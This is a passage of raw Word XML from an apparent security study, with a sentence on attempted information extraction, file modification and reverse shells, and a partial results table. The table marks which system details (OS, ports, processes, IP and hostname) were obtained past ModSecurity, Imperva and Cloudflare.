      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>extraction of</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> information, modif</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ication of</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> files and ultimately, achiev</w:t>
      </w:r>
      <w:r w:rsidR="00D40C55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ing of</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> a reverse shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> were </w:t>
      </w:r>
      <w:r w:rsidR="009B68EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>attempted</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5995" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2012"/>
        <w:gridCol w:w="1383"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="1300"/>
      </w:tblGrid>
      <w:tr w:rsidR="002B0490" w:rsidRPr="00285946" w14:paraId="41550150" w14:textId="77777777" w:rsidTr="006A6BB2">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2012"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3EEF782" w14:textId="07274FFE" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Access/Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0199E177" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ModSecurity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="076B3E4B" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Imperva</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38416F3B" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Cloudflare</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B0490" w:rsidRPr="00285946" w14:paraId="34F9DD15" w14:textId="77777777" w:rsidTr="006A6BB2">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2012" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7520382B" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Server OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7017CF37" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C756C16" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FC0729E" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B0490" w:rsidRPr="00285946" w14:paraId="56EAC8A5" w14:textId="77777777" w:rsidTr="006A6BB2">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2012" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70A3459E" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Open ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42B2BA2E" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D9D533F" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="778F7E3C" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B0490" w:rsidRPr="00285946" w14:paraId="04087494" w14:textId="77777777" w:rsidTr="006A6BB2">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2012" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08203DBB" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Processes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57ECF5F7" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38A4E610" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="291ACBC8" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B0490" w:rsidRPr="00285946" w14:paraId="5D4509B2" w14:textId="77777777" w:rsidTr="006A6BB2">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2012" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="536CF8BA" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>IP &amp; Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="168EE2CC" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="029F5CD1" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36B873F3" w14:textId="77777777" w:rsidR="002B0490" w:rsidRPr="00285946" w:rsidRDefault="002B0490" w:rsidP="00050720">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00285946">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B0490" w:rsidRPr="00285946" w14:paraId="2A2096D7" w14:textId="77777777" w:rsidTr="006A6BB2">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
